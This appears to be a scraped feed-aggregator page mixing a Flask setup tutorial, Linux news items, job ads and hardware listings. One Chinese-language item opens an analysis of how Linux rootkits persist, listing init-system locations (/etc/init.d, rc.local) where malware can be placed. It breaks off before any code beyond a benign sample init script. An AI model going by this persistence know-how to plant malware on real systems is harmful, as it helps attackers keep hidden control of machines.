Create an app.yaml file in your main folder with the following code: runtime: python27 api_version: 1 threadsafe: true handlers: - url: /static static_dir: static - url: /.* script: main.app libraries: - name: ssl version: latest Create an appengine_config.py file in your main folder with the following code: from google.appengine.ext import vendor
          Install Flask and create your first web application      Cache   Translate Page      

There are ton of python web frameworks and Flask is one of them but it is not a full stack web framework.

It is “a microframework for Python based on Werkzeug , Jinja 2 and good intentions.” Includes a built-in development server, unit tesing support, and is fully Unicode-enabled with RESTful request dispatching and WSGI compliance .

Installation

To install flask you can go here or just follow below steps:

Step1: Install virtual environment

If you are using Python3 than you don't have to install virtual environment because it already come with venv module to create virtual environments.

If you are using Python 2, the venv module is not available. Instead, install virtualenv .

On linux, virtualenv is provided by your package manager:

//Debian, Ubuntu $ sudo apt-get install python-virtualenv //CentOS, Fedora $ sudo yum install python-virtualenv //Arch $ sudo pacman -S python-virtualenv

If you are on Mac OS X or windows, download get-pip.py , then:

$ sudo python2 Downloads/get-pip.py $ sudo python2 -m pip install virtualenv

On Windows, as an administrator:

\Python27\python.exe Downloads\get-pip.py \Python27\python.exe -m pip install virtualenv Step 2: Create an environment

Create a project folder and a venv folder within:

mkdir myproject cd myproject python3 -m venv venv
Install Flask and create your first web application

On Windows:

py -3 -m venv venv

If you needed to install virtualenv because you are on an older version of Python, use the following command instead:

virtualenv venv

On Windows:

\Python27\Scripts\virtualenv.exe venv Activate the environment

Before you work on your project, activate the corresponding environment:

. venv/bin/activate
Install Flask and create your first web application

On Windows:

venv\Scripts\activate

Your shell prompt will change to show the name of the activated environment.

Step 3: Install Flask

Within the activated environment, use the following command to install Flask:

$ pip install Flask
Install Flask and create your first web application

Flask is now installed:Check out the Quickstart or go to the Documentation .

Create a applcation

So, let's build the most simplest hello world application.

Follow these steps:

As, you are already present in the myproject folder. Create a file `hello.py' and write the below code.

Import the Flask class. An instance of this class will be our WSGI application.

from flask import Flask

Next we create an instance of this class. The first argument is the name of the application’s module or package. If you are using a single module (as in this example), you should use name because depending on if it’s started as application or imported as module the name will be different (' main ' versus the actual import name). This is needed so that Flask knows where to look for templates, static files, and so on.

app = Flask(__name__)

We then use the route() decorator to tell Flask what URL should trigger our function.The function is given a name which is also used to generate URLs for that particular function, and returns the message we want to display in the user’s browser.

@app.route('/') def hello_world(): return 'Hello, World!'

Make sure to not call your application flask.py because this would conflict with Flask itself.

To run the application you can either use the flask command or python’s -m switch with Flask. Before you can do that you need to tell your terminal the application to work with by exporting the FLASK_APP environment variable:

$ export FLASK_APP=hello.py $ flask run //Or you can use $ export FLASK_APP=hello.py $ python -m flask run
Install Flask and create your first web application
Go to http://127.0.0.1:5000/ to see your project running.
Install Flask and create your first web application

Check out my blog: SourceAI


          Senior Linux Engineer - Method Studios - Vancouver, BC      Cache   Translate Page      
Method Studios is currently searching for a Systems Engineer to join its Technology team. The primary focus of this position is in systems architecture and...
From Method Studios - Tue, 06 Nov 2018 22:49:49 GMT - View all Vancouver, BC jobs
          Linus Torvalds: Linux 4.20-rc1      Cache   Translate Page      

Miután Greg KH visszaadta a gyeplőt, Linus a beolvasztási időablak bezárásával kiadta a 4.20-as kernel első prepatchét. Várhatóan ez lesz az utolsó 4.x kernel, jövő év elején Linus már 5-tel kezdődő kernelverziószámot tervez:

So I did debate calling it 5.0, but if we all help each other, I'm sure we can count to 20. It's a nice round number, and I didn't want to make a pattern of it. I think 5.0 happens next year, because then I *really* run out of fingers and toes.

Részletek a bejelentésben.


          A Microsoft MIT licenc alatt kiadta a ProcDump nevű SysInternals eszköz linuxos verzióját      Cache   Translate Page      

Forrás elérhető a GitHub-on.


          Senior Linux Engineer - Method Studios - Vancouver, BC      Cache   Translate Page      
Develop and maintain high-level digital security standards required in a post-production environment....
From Method Studios - Tue, 06 Nov 2018 22:49:49 GMT - View all Vancouver, BC jobs
          LinuxGameCast Weekly Video: LinuxGameCast Weekly 324: Pixelated Tit Shots      Cache   Translate Page      
System76 has a woody, Artifact gets a release date, Shroud of the Avatar goes free to play and NVIDIA RTX 2080 Ti cards spontaneously nope.
          Senior Linux Engineer - Method Studios - Vancouver, BC      Cache   Translate Page      
Experience with VMware or OpenStack virtual infrastructures. The primary focus of this position is in systems architecture and infrastructure engineering....
From Method Studios - Tue, 06 Nov 2018 22:49:49 GMT - View all Vancouver, BC jobs
          Remote Senior Linux Systems Engineer      Cache   Translate Page      
A financial company needs applicants for an opening for a Remote Senior Linux Systems Engineer. Individual must be able to fulfill the following responsibilities: Leading cross-functional project teams to design and implement Linux/Java infrastructures Acting as a primary infrastructure interface for business unit and operations teams Providing technical documentation to Project and Operations teams as part of project deliverables Required Skills: Ability to travel up to 20% of the time High School diploma 5+ years of professional work experience in a related role
          By default, T2-equipped Macs won’t boot Linux or anything except macOS and Windows 10      Cache   Translate Page      
none
          Remote Lead Kernel Engineer      Cache   Translate Page      
A cloud computing company is filling a position for a Remote Lead Kernel Engineer. Individual must be able to fulfill the following responsibilities: Acting as the hands on technical leader for the kernel engineering team Developing and deploying changes and new features to the kernel Working with security to evaluate and mitigate new kernel level threats Required Skills: Experience developing for the Linux kernel, either professionally or strong open source contributions Familiarity with the Linux kernel including but not limited to the network stack, filesystems, scheduler, etc Ability to work with stakeholders within engineering, security, and product Willingness to learn and tenacity (we have tracked down CPU bugs!) Strong proficiency in C and comfort with x86 architecture An eye for correctness and performance, in that order
          Telecommute Technology Writer      Cache   Translate Page      
A technology tutorial website is filling a position for a Telecommute Technology Writer. Core Responsibilities of this position include: Explaining complicated stuff and make it easy for anyone to follow Writing regular posts on a long-term basis, at least 1-2 500-800 words articles every week Writing tutorials for various operating systems such as Windows, Mac and Linux, Mobile OS (iOS and Android) Required Skills: Must have a good working knowledge of the WordPress blogging platform Must be able to take cool screenshots and turn them into images that can be use in articles Must be able to participate actively to readers comments for all your published posts
          LibreOffice 6.1.3 et 6.0.7 sont disponibles pour Windows, macOS et Linux : zoom sur les mises à jour de l'alternative open source à Microsoft Office      Cache   Translate Page      
LibreOffice 6.1.3 et 6.0.7 sont disponibles pour Windows, macOS et Linux
Zoom sur les mises à jour de l'alternative open source à Microsoft Office

« The Document Foundation » (TDF) a récemment annoncé la sortie officielle de LibreOffice 6.0.7 et LibreOffice 6.1.3, deux nouvelles mises à jour mineures de l'alternative open source à Microsoft Office qui améliorent la qualité et la stabilité des versions précédentes et intègrent un patch de sécurité.


LibreOffice 6.1.3

Cette version de LibreOffice...
          Web/Networking Programming Task.      Cache   Translate Page      
a simple web-based solution that allows you to measure the offset between the clock on the system that runs a browser and a web server. The idea for this problem was inspired by website http://time.is/... (Budget: $10 USD, Jobs: Javascript, Linux, Network Administration, PHP, Python)
          IBM-Red Hat: Get Open Source Training to Prepare for Acquisition      Cache   Translate Page      
With IBM's Red Hat acquisition announcement still fresh, now's the time for the channel to be sure its people are trained in Linux and open source.
          Microsoft supports Linux admins by porting famous Windows Sysinternals suite, beginning with “ProcDump”      Cache   Translate Page      
Microsoft loves LinuxMicrosoft has announced it is working to port tools from its Sysinternals utility suite to Linux. The suite of applications has gained an almost legendary status amongst Windows system administrators. Yesterday, Microsoft employee David Fowler announced the release of the first Sysinternals tool for Linux, process dump creation utility ProcDump. Microsoft executive Mario Hewardt, Principal […]
          Amazon Linux: supporto Java fino al 2023      Cache   Translate Page      

Amazon estende il supporto gratuito alle versioni di OpenJDK che Oracle dismetterà entro il 2020.

Leggi Amazon Linux: supporto Java fino al 2023


          Como instalar o cliente de e-mail Mailspring no Linux      Cache   Translate Page      
Como instalar o cliente de e-mail Mailspring no Linux

Se você sempre gostou da aparência de Nylas N1, mas achava ele lento, conheça e veja omo instalar o cliente de e-mail Mailspring no Linux.

Leia o restante do texto "Como instalar o cliente de e-mail Mailspring no Linux"

O post Como instalar o cliente de e-mail Mailspring no Linux apareceu primeiro em Blog do Edivaldo.


          Como instalar o Visual Studio Code no Linux via Flatpak      Cache   Translate Page      
Como instalar o Visual Studio Code no Linux via Flatpak

Se você quer usar o editor de código multiplataforma da Microsoft nos sistema do pinguim, veja como instalar o Visual Studio Code no Linux via Flatpak.

Leia o restante do texto "Como instalar o Visual Studio Code no Linux via Flatpak"

O post Como instalar o Visual Studio Code no Linux via Flatpak apareceu primeiro em Blog do Edivaldo.


          Como instalar o jogo 0 A.D. no Linux via Flatpak      Cache   Translate Page      
Como instalar o jogo 0 A.D. no Linux via Flatpak

Se você curte games de estratégia em tempo real semelhante a "Age of Empires", conheça e veja como instalar o jogo 0 A.D. no Linux via Flatpak.

Leia o restante do texto "titulo"

O post Como instalar o jogo 0 A.D. no Linux via Flatpak apareceu primeiro em Blog do Edivaldo.


          Como usar o VLC para enviar vídeo para o Chromecast no Linux      Cache   Translate Page      
Como usar o VLC para enviar vídeo para o Chromecast no Linux

Se você tem vídeos no PC e quer exibi-los na sua TV usando o dongle multimídia do Google, veja como usar o VLC para enviar vídeo para o Chromecast no Linux.

Leia o restante do texto "Como usar o VLC para enviar vídeo para o Chromecast no Linux"

O post Como usar o VLC para enviar vídeo para o Chromecast no Linux apareceu primeiro em Blog do Edivaldo.


          Como reparar um pendrive corrompido ou defeituoso no Linux      Cache   Translate Page      
Como reparar um pendrive corrompido ou defeituoso no Linux

Todo mundo tem um pendrive. Mas as vezes, eles podem ficar corrompidos ou deixar de funcionar. Por isso, nesse tutorial você verá como reparar um pendrive corrompido ou defeituoso no Linux.

Leia o restante do texto "Como reparar um pendrive corrompido ou defeituoso no Linux"

O post Como reparar um pendrive corrompido ou defeituoso no Linux apareceu primeiro em Blog do Edivaldo.


          Instale e experimente o cliente Google Drive Insync no Linux      Cache   Translate Page      
Instale e experimente o cliente Google Drive Insync no Linux

Se você ainda está a procura de uma opção para usar o Gdrive no seu sistema, instale e experimente o cliente Google Drive Insync no Linux.

Leia o restante do texto "Instale e experimente o cliente Google Drive Insync no Linux "

O post Instale e experimente o cliente Google Drive Insync no Linux apareceu primeiro em Blog do Edivaldo.


          Como instalar o cliente do jogo Albion Online no Linux via Flatpak      Cache   Translate Page      
Como instalar o cliente do jogo Albion Online no Linux via Flatpak

Se você gosta de jogos MMORPG medievais com um mundo gigantesco, conheça e veja como instalar o cliente do jogo Albion Online no Linux via Flatpak.

Leia o restante do texto "Como instalar o cliente do jogo Albion Online no Linux via Flatpak"

O post Como instalar o cliente do jogo Albion Online no Linux via Flatpak apareceu primeiro em Blog do Edivaldo.


          Como instalar o Cliente BitTorrent Transmission no Linux via Flatpak      Cache   Translate Page      

Se você vive baixando arquivos torrents na web e quer uma poderosa ferramenta para isso, conheça e veja como instalar a última versão do Cliente BitTorrent Transmission no Linux via Flatpak.

Leia o restante do texto "Como instalar o Cliente BitTorrent Transmission no Linux"

O post Como instalar o Cliente BitTorrent Transmission no Linux via Flatpak apareceu primeiro em Blog do Edivaldo.


          Cómo compartir archivos y carpetas entre Windows 10 y Ubuntu      Cache   Translate Page      

Tanto el sistema operativo de Microsoft, nos referimos a Windows 10, como una de las distribuciones de Linux más usadas y populares del mundo, Ubuntu, hace pocos días han lanzado importantes actualizaciones para ambos sistemas operativos, donde hemos podido ver, como no podía ser de otro modo, importantes nuevas funciones. Pues bien, seguro que muchos

El artículo Cómo compartir archivos y carpetas entre Windows 10 y Ubuntu se publicó en SoftZone.


          Sr ICT Beheerder Linux Storage      Cache   Translate Page      
Functieomschrijving / werkzaamheden: - het raadplegen van het werkzaamheden registratiesysteem; - het inhoudelijk beoordelen en interpreteren van aanvragen op proces, product, technische en logistieke aspecten; - het zo nodig inwinnen van nadere informatie; - het maken en registreren van nadere afspraken met klanten/gebruikers; - het controleren op volledigheid en werking van de te leveren ICT middelen; - het controleren of aan alle randvoorwaarden is voldaan; - het afstemmen van afwijkingen in de uitvoering; - het instrueren van gebruikers over de geleverde ICT middelen; - het bewaken en signaleren van de status van de ICT middelen en het proactief handelen hierop; - het nemen van preventieve en correctieve maatregelen; - het begeleiden van leveranciers - het uitvoeren van installatiewerkzaamheden...
          Microsoft is Porting Sysinternals Tools to Linux - ProcDump Released      Cache   Translate Page      
If you have administered Windows computers or assisted in Windows malware removal, then there is a good chance you have heard of the popular free Sysinternals utilities.  [...]
          Details - Radical Minds Technologies - Job, WV      Cache   Translate Page      
Linux/Unix server installation, configuration. Linux/Unix Administration and Troubleshooting. VMware Administration virtualization techniques or any other...
From Radical Minds Technologies - Mon, 17 Sep 2018 10:32:29 GMT - View all Job, WV jobs
          UNIX ENGINEER III - OneNeck IT Solutions - Madison, WI      Cache   Translate Page      
Professional level or higher certification in (Linux, Oracle Virtual Machine (OVM), HP-UX) preferred. Technology experience in (MS-SQL, Oracle, Informix, or...
From OneNeck IT Solutions - Tue, 06 Nov 2018 00:54:48 GMT - View all Madison, WI jobs
          Microsoft sort une version Linux de l'outil ProcDump de SysInternals et annonce l'arrivée de ProcMon pour la même plateforme      Cache   Translate Page      
Microsoft sort une version Linux de l'outil ProcDump de SysInternals
Et annonce l'arrivée de ProcMon pour la même plateforme

Un architecte logiciel de la firme de Redmond s'est fait le relais de cette information il y a quelques heures : une version Linux (publiée sous licence MIT) de l'outil ProcDump de SysInternals (propriété de Microsoft depuis juillet 2006) est disponible.


Lorsqu'un bogue survient en production, il n'est pas toujours aisé de reproduire le problème sur une plateforme de développement...
          Software Engineer - re&m - East Anglia      Cache   Translate Page      
Degree in computer science or equivalent training Minimum 7 years C/C++ development on one of Windows NT, Macintosh, or UNIX/Linux platforms Knowledge of Pre...
From re&m - Mon, 17 Sep 2018 07:00:23 GMT - View all East Anglia jobs
          Kommentar zu Acer Chromebook 514 ist ab 449 Euro zu haben von GooglePayFan      Cache   Translate Page      
Das interessiert mich auch. Oder allgemein wie leicht man dort eine Linux-Distribution installieren kann.
          Kάρτα δικτύου AS-T10G με ταχύτητες έως και 10Gb      Cache   Translate Page      
Για όσους θα ήθελαν να προσθέσουν στον υπολογιστή τους μια πάρα πολύ γρήγορη κάρτα δικτύου, η ASUSTOR ανακοίνωσε την νέα της 10G Base-T κάρτα δικτύου, AS-T10G.

Η AS-T10G υποστηρίζει ταχύτητες 10GbE και είναι συμβατή και με ταχύτητες 5GbE, 2.5GbE, 1GbE και 100MbE, ενώ διαθέτει μια θύρα RJ-45. Υποστηρίζονται ASUSTOR ADM, Windows, Linux, Mac OS και VMware ESXi, επιτρέποντας ευέλικτες εγκαταστάσεις.
  Η AS-T10G διατίθεται τόσο με πλήρους, όσο και με μισού ύψους bracket, επιτρέποντας την τοποθέτησή της σε συνηθισμένα κουτιά υπολογιστών, αλλά και σε λεπτά κουτιά που δέχονται μόνο κάρτες μισού ύψους. Διατίθεται και ASUSTOR NAS bracket για τα AS7008T και AS7010T που όμως πωλείται ξεχωριστά και επιτρέπει την αναβάθμιση σε 10GbE ταχύτητες.

Η ASUSTOR διαθέτει μια ποικιλία 10GbE NAS, συμπεριλαμβανομένων των AS4002T, AS4004T, AS7008T, AS7010T, AS7009RDX και AS7012RDX, επιτρέποντας σε workstations και συσκευές ASUSTOR NAS να επικοινωνούν με υψηλότερες ταχύτητες, ανεξάρτητα από τον προϋπολογισμό.

1121239441_ASUSTORAST10Gcompatible_map.jpg

Η AS-T10G της ASUSTOR έχει εγγύηση ενός έτους και κοστολογείται στα 109 δολάρια.

Παρακάτω αναφέρονται τα κυριότερα τεχνικά χαρακτηριστικά.

AS-T10G Specifications: 
-Supports:
  • 16KB Frames
  • IEEE 802.3x Ethernet Flow Control
  • IP, TCP, UDP checksum offloading
  • Supports 100MbE, 1GbE, 2.5GbE, 5Gb/s and 10GbE speeds
  • 802.1Q Virtual LAN (VLAN) tagging
-Supported standards:
  • IEEE 802.3ae: 10-Gigabit Ethernet
  • IEEE 802.3x: Ethernet Flow Control
  • IEEE 802.2ad: Link Aggregation
  • IEEE 802.1Q VLAN
  • RFC2819 RMON MIB
-Maximum speed:10 Gbps 
-Duplex Mode: Full Duplex 
-Interface: PCIe 2.0 x4 
-Operating System Support:
  • Windows 7 and above (32/64-bit)
  • Windows Server 2012 and above (32/64-bit)
  • Linux 2.6.x and above (32/64-bit)
  • MacOS 10.10 and above
  • VMware ESXi 5.1 and above, Microsoft Hyper-V, Linux KVM, Oracle VirtualBox
-Size: 82 x 62 x 13 mm

          GraphQL Gets Its Own Foundation      Cache   Translate Page      

Addressing the rapidly growing user base around GraphQL, The Linux Foundation has launched the GraphQL Foundation to build a vendor-neutral community around the query language for APIs (application programming interfaces). “Through the formation of the GraphQL Foundation, I hope to see GraphQL become industry standard by encouraging contributions from a broader group and creating a […]

The post GraphQL Gets Its Own Foundation appeared first on The New Stack.


          Linux下的Rootkit驻留技术分析      Cache   Translate Page      
前言 Linux作为服务器和IoT设备使用的主要操作系统,针对它的恶意软件也层出不穷。针对Linux设备的恶意软件(以下称为rootkit)通常需要长期驻留于目标操作系统以达到获利目的,所以如何实现驻留也是Linux rootkit作者的重点考虑内容之一,对此,天融信阿尔法实验室进行了可能的思路探索和分析。 在接下来的说明中,我们统一使用一个名为evil的静态链接ELF文件作为我们要实现驻留的rootkit,所有的驻留尝试均围绕这个程序展开。 技术汇总 1. 用户态下的可利用点 1.1 各种init的利用 Linux init 在systemd成为主流之前,sysvinit是大多数发行版的选择,即使是Ubuntu之前使用的upstart,和sysvinit也是完全兼容的,直到今天,Debian系发行版仍保留sysvinit的兼容性。作为Linux的init程序,也就是PID 1,负责启动之后的所有进程,所有的服务都是由它管理,因此它是实现rootkit驻留的最常见手段。 对于传统的sysvinit,常见的驻留点都需要以root身份写入: /etc/init.d /etc/rc[runlevel].d /etc/rc.local 其实sysv的服务文件就是遵循sysv规范的shell脚本,它在嵌入式设备中也很常见。给出一个sysv风格的服务文件如下: #!/bin/sh PATH=/bin:/usr/bin:/sbin:/usr/sbin DESC="cron daemon" NAME=cron DAEMON=/usr/sbin/cron PIDFILE=/var/run/crond.pid SCRIPTNAME=/etc/init.d/"$NAME" test -f $DAEMON || exit 0 . /lib/lsb/init-functions [ -r /etc/default/cron ] && . /etc/default/cron parse_environment() { for ENV_FILE in /etc/environment /etc/default/locale; do [ -r "$ENV_FILE" ] || continue [ -s "$ENV_FILE" ] || continue for var in LANG LANGUAGE LC_ALL LC_CTYPE; do value=$(egrep "^${var}=" "$ENV_FILE" | tail -n1 | cut -d= -f2) [ -n "$value" ] && eval export $var=$value if [ -n "$value" ] && [ "$ENV_FILE" = /etc/environment ]; then log_warning_msg […]
          RT @gihyojp: Linux Daily Topics「2018年11月5日 Linus完全復活,次期Linuxカーネル"4.20"最初のリリース候補版を公開」公開 https://t.co/k7hEx5382Y      Cache   Translate Page      
none
          DistroWatch Weekly, Issue 788 05 November 2018      Cache   Translate Page      
Review of Clu Linux Live 6.0, Mint updates Cinnamon, Steam supports windows games on linux, Fedora and Korora 27 End of Life, Red Hat dropping KDE and BTRFS support, update from the Solus team.
          systemctl list-units「インストールされているUnitファイルの一覧を表示するにはlist-unit-filesオプションを利用する」【新旧対応】Linuxでの自動起動の設定方法を解説 https://t.co/MX27xamNWb      Cache   Translate Page      
none
          update-rc.d サービス名 disable Debian GNU/Linuxでサービスの自動起動をやめさせる方法 - ブログ - ワルブリックス株式会社 https://t.co/A0tnR0k6pX      Cache   Translate Page      
none
          Migration Consultant OpenVMS      Cache   Translate Page      
Migration Consultant (OpenVMS) > Location: Slough > Division: Transoft > Function: Professional Services > Reporting to: Martin Farndale We’re Advanced Join a business that embraces innovation, gives you the scope to seize every opportunity and will help get you where you want to go. Life at Advanced begins in an unprecedented environment with a role that matters, taking you on a fast paced journey of discovery, however big that might be. We’re one of the UK’s largest and fastest growing software companies. True partnership is the defining thing that makes us different from the competition. We pride ourselves on delivering focused software solutions for public sector, enterprise commercial and health & care organisations that simplify complex business challenges and deliver immediate value. Team & Role We are seeking an experienced Migration Consultant with a successful track record of delivering application and data migration solutions from the OpenVMS legacy system. The Migration Consultant will specialise in refactoring legacy systems from 3rd generation languages such as C/C++. This role requires in depth C/C++ skills and extensive real-world experience preferably in a broad range of business software systems. This role involves the application of Transoft technologies to help deliver a sustainable future for crucial business applications. The Requirements You will: Learn and operate the Transoft modernisation toolset Function as an effective project team member Maintain a cooperative nature at all times Maintain the ability to both take instruction and work under own initiative as required. Be able to maintain a sharp focus on and finish intensive projects. Have a good awareness of technological developments and best practice Be able to adapt and apply new ideas as appropriate Successfully hand over solutions to relevant internal or external staff, including knowledge transfer Deliver and promote quality, excellence and continuous service improvement for Professional Services engagements Keep abreast of new features and functions made available within the Advanced 365 suite of products We would like you to have: The successful candidate requires strong consultancy skills and, and is an excellent motivator of individuals in order to meet deadlines and manage change. You will have real-world experience of delivering concurrent small & medium scale projects on time and within budget. Experience needed: 5+ years of C/C++ design, implementation and support In depth experience within Windows and Linux development including operating systems APIs OpenVMS Experience is an advantage Database design and implementation – SQL is a must Modern build and deployment experience (i.e. Gradle, Cmake) Scripting in Perl or Python an advantage Transoft toolset training will be provided Essential Skills: Strong communication skills, written and spoken Well presented and good interpersonal skills Comfortable in both structured and unstructured working environments Energy and enthusiasm to deliver a successful project Comfortable in customer facing role Education / Qualifications A university degree in a relevant subject Join the A Team Insert Key benefits from working within the department / function (your sell) Excellent benefits from day one: contributory pension, life insurance, income protection insurance, childcare voucher salary sacrifice, cycle to work scheme, and employee assistance programme 25 days holidays Special focus on training and development with the opportunity to excel your career from our internal Talent Development Team The ability to work with engaged colleagues who share a passion for solving business problems Working in an organisation that encourages 360 feedback at all levels Be part of an organisation that has recently been ranked by Deloitte in the Top 50 fastest growing tech Companies
          HyperX Black 8GB DDR4 2666MHz - Jelenlegi ára: 28 900 Ft      Cache   Translate Page      
SzínfeketeCsatlakozótűk száma288 Kapacitás8 GBSebesség2, 666 GHzMemóriakésleltetésCL 16Hűtőborda✔ Feszültség1. 2 VMemóriaKivitel288-pin DIMMMemória kialakítása ( modul x méret )1 x 8 GBCAS látencia16Nem pufferelt memória✔ SPD profi✔ Kompatibilis lapkakészletekIntel X99Belső memória8 GBKomponenesPC / serverMemória típusaDDR4Intel Extreme Memory Profile (XMP)✔ TípusDIMMÓlombevonatAranyBelső memória típusaDDR4Memóriafeszültség1. 2 VMemória órajel2666 MhzMemóriatípusPC4-21300KompatibilitásTámogatott Linux verziókVanTámogatott Mac operációs rendszer verziókVanTámogatott Windows verziókVanErgonómia / FormatervezésHűtés típusaHeatsinkKörnyezeti feltételekTárolási hőmérséklettartomány (T-T)-55 ? 100 °CÜzemi hőmérséklettartomány (T-T)0 - 85 °CMéretek és súlySzélesség133, 3 mmMagasság3, 4 cmMélység7, 08 mm
HyperX Black 8GB DDR4 2666MHz
Jelenlegi ára: 28 900 Ft
Az aukció vége: 2018-11-28 02:53
          Netgear ReadyNAS 3312 - Jelenlegi ára: 1 289 000 Ft      Cache   Translate Page      
TípusNASSzínfeketeMaximális kapacitás120000 GBBackup szoftver✔ Merevlemez férőhelyek száma12 dbRAID szintek269412 / 1 / 5 / 10RAID támogatás✔ ProcesszorProcesszormodellE3-1225V5Processzor órajele3, 7 GHzProcesszormagok száma4 Processzor package size37. 5 x 37. 5Rendszer bus sebesség8 GT/sProcesszor cache típusaSmart CacheProcesszorszálak száma4 Bus típusDMI3Processzor kódnévSkylakeProcesszor által támogatott maximális belső memória64 GBProcesszorsorozatIntel Xeon E3-1200 v5Thermal Design Power (TDP)80 WConflict Free processor✔ ECC supported by processor✔ CPU configuration (max)1 Processzor ARK ID88168PCI Express csatornák maximális száma16 Processzor gyártási technológiája14 nmProcesszor üzemmódok64 bitSkálázhatóság1SProcesszor által támogatott memória sávszélesség (max)34, 1 GB/sProcessszorcsaládIntel Xeon E3 v5Processzor cache mérete8 MBMemóriaBelső memória mérete8 GBTámogatott maximális memória128 GBBelső memória típusaDDR4Flash memória mérete256 MBKompatibilitásTámogatott fájlrendszerekFAT32 / HFS+ / NTFS / ext3 / ext4Támogatott merevlemezSSDTámogatott Windows verziókWindows 10 Education / Windows 10 Education x64 / Windows 10 Enterprise / Windows 10 Enterprise x64 / Windows 10 Home / Windows 10 Home x64 / Windows 10 Pro / Windows 10 Pro x64 / Windows 7 Enterprise / Windows 7 Enterprise x64 / Windows 7 Home Basic / Windows 7 Home Basic x64 / Windows 7 Home Premium / Windows 7 Home Premium x64 / Windows 7 Professional / Windows 7 Professional x64 / Windows 7 Starter / Windows 7 Starter x64 / Windows 7 Ultimate / Windows 7 Ultimate x64 / Windows 8 / Windows 8 Enterprise / Windows 8 Enterprise x64 / Windows 8 Pro / Windows 8 Pro x64 / Windows 8 x64 / Windows 8. 1 / Windows 8. 1 Enterprise / Windows 8. 1 Enterprise x64 / Windows 8. 1 Pro / Windows 8. 1 Pro x64 / Windows 8. 1 x64CsatlakozókeSata csatlakozó✔ Merevlemez csatlakozóSATA3Ethernet✔ USB csatlakozóVanUSB portVanTeljesítményIntegrált kapcsoló✔ Backup funkció✔ Beépített BitTorrent client✔ Backup jellemzőkCloudS. M. A. R. T. támogatás✔ Webalapú kezelés✔ Hozzáférési vezérlő lista (ACL)✔ Beépített iTunes server✔ Network Time Protocol (NTP) cliens✔ Felhasználók száma8192 felhasználTámogatott böngészőMicrosoft Internet Explorer 9+ / Mozilla Firefox 14+ / Google Chrome 20+ / Apple Safari 5+Meghibásodások közötti átlagos idő (MTBF)159519 óHot spare✔ Támogatott szerver operációs rendszerekWindows Server 2008 / Windows Server 2008 R2 / Windows Server 2012Támogatott Linux verziókVanTámogatott Mac operációs rendszer verziókVanZajszint30 dBIntegrált GPUAlapfrekvencia400 MhzDinamikus frekvencia (max)1150 MhzTámogatott kijelzők száma3 OpenGL verzió4, 4 ModellIntel HD Graphics P530ID0x191DPortokeSATA portok száma2 Ethernet LAN (RJ-45) portok száma4 Processzor speciális funkciókEmbedded options available✔ Graphics & IMC lithography14 nmNyugalmi állapot✔ Hőmérséklet monitoring Technológia✔ Enhanced Intel SpeedStep Technológia✔ Intel Wireless Display (WiDi) Technológia✔ Execute Disable Bit✔ Intel Virtualization Technology for Directed I/O (VT-d)✔ Intel? Turbo Boost Technológia2 Intel vPro Technológia✔ Intel? Quick Sync Video Technológia✔ Intel Clear Video HD Technológia✔ Intel? Insider? ✔ Intel Smart Cache✔ Intel AES New Instructions✔ Intel Trusted Execution Technológia✔ Intel Enhanced Halt State✔ Intel VT-x with Extended Page Tables (EPT)✔ Intel? Secure Key✔ Intel TSX-NI✔ Intel? OS Guard✔ Intel Clear Video Technológia✔ Intel Clear Video Technológia for MID✔ Intel 64✔ Intel Virtualization Technológia (VT-x)✔ Intel? InTru? 3D Technology✔ Memory channels supported by processorDuplaMemory types supported by processorDDR3L-SDRAM / DDR4-SDRAMMemory voltage supported by processor1, 35 VHűtésVentilátorok száma3 fanVentilátor átmérő8 cmTanúsítványokTanúsítványokFCC / CE / VCCIRoHS szabvány✔ TárolóegységTelepített tároló típusaNincsMaximális tárolókapacitás120 TBHot-swap meghajtó hely✔ Meghajtó interfészSerial ATA IIITámogatott meghajtók száma12 RAID-szintek273524 / 1 / 5 / 10 / JBODRAID támogatás✔ Ergonómia / FormatervezésGépház típusaRack (2U)LED-kijelzőkVanHűtés típusaAktívGrafikus megjelenítésMaximális integrált grafikus memória1, 7 GBDirectX12. 0Környezeti feltételekÜzemi hőmérséklettartomány (T-T)0 - 40 °CRelatív üzemi páratartalom-tartomány20 - 80%EnergiamenedzsmentAC bemeneti frekvencia50 / 60 HzAC adapter bemeneti feszültség100 ? 240 VKapcsolatUSB 3. 0 (3. 1 Gen 1) Type-A portok száma2HálózatiSCSI-támogatás✔ DHCP kliens✔ Terheléskiegyenlítő rendszer✔ Támogatott hálózati protokollokTCP / IP / HTTP / HTTPS / FTP / SSHÓriáskeret támogatással✔ LAN adatátviteli sebesség10 / 100 / 1000 Mbit/sEthernet/LAN csatlakozás✔ TápellátásTápegység helyebeépítettTápegység (PSU) kapacitás550 WAlaplapProcesszorfoglalatLGA 1151 (Socket H4)Méretek és súlySúly12 kgSzélesség445 mmMagasság8, 8 cmMélység707 mmBővítőhelyekPCI Express verzió3. 0PCI Express konfiguráció1x16, 1x8+2x4, 2x8Technikai részletekBeépített UPnP AV médiaszerver✔ System log✔ FunkciókMappamegosztás1024Megosztott mappák elérési jogainak kezelése✔
Netgear ReadyNAS 3312
Jelenlegi ára: 1 289 000 Ft
Az aukció vége: 2018-11-28 02:51
          Happy 15th Birthday, Fedora Linux!      Cache   Translate Page      
Fedora is the best desktop Linux distribution for many reasons. Not only is it fast and reliable, but it is constantly kept up to date with fairly bleeding edge packages. Not to mention, it uses the greatest desktop environment, GNOME, by default. Most importantly, it respects and follows open source ideology. It is a pure Linux and FOSS experience that is an absolute joy to use. It's no wonder Linus Torvalds -- the father of Linux -- chooses it. With all of that said, Fedora didn't get great overnight. It took years of evolution to become the exceptional operating system… [Continue Reading]
          Microsoft is porting Sysinternals utilities to Linux, starting with ProcDump      Cache   Translate Page      
Microsoft has embraced Linux more and more over the years, and the latest demonstration of this is the company's decision to port the free Sysinternals utilities to work on the platform. The first tool to make its way to Linux is ProcDump, which can be used to create crash dumps. While not as feature-rich as the Windows version, the Linux port is still a valuable tool. And, importantly, there are more Systinternals tools making their way to Linux. Systinternals software long-proved popular with Windows users. So much so, that over a decade ago Microsoft decided to buy the company behind… [Continue Reading]
          freenode #live 2018 - Kyle Rankin - The death and resurrection of Linux Journal      Cache   Translate Page      

Please support Linux Journal by subscribing or becoming a patron.


          DevOps Engineer      Cache   Translate Page      
VA-Crystal City, Job Description: Develop scripts and applications for Linux Debug scripts and applications in various versions of Lint and other debugging tools Orchestration of Linux systems including: use of saltstack, puppet or chef; automated self-test functionality Basic Qualifications: Eight or more years of engineering and administrative experience Developing scripts and applications for Linux Debugging sc
          Apple blocks Linux on new Macs with T2 security chips      Cache   Translate Page      

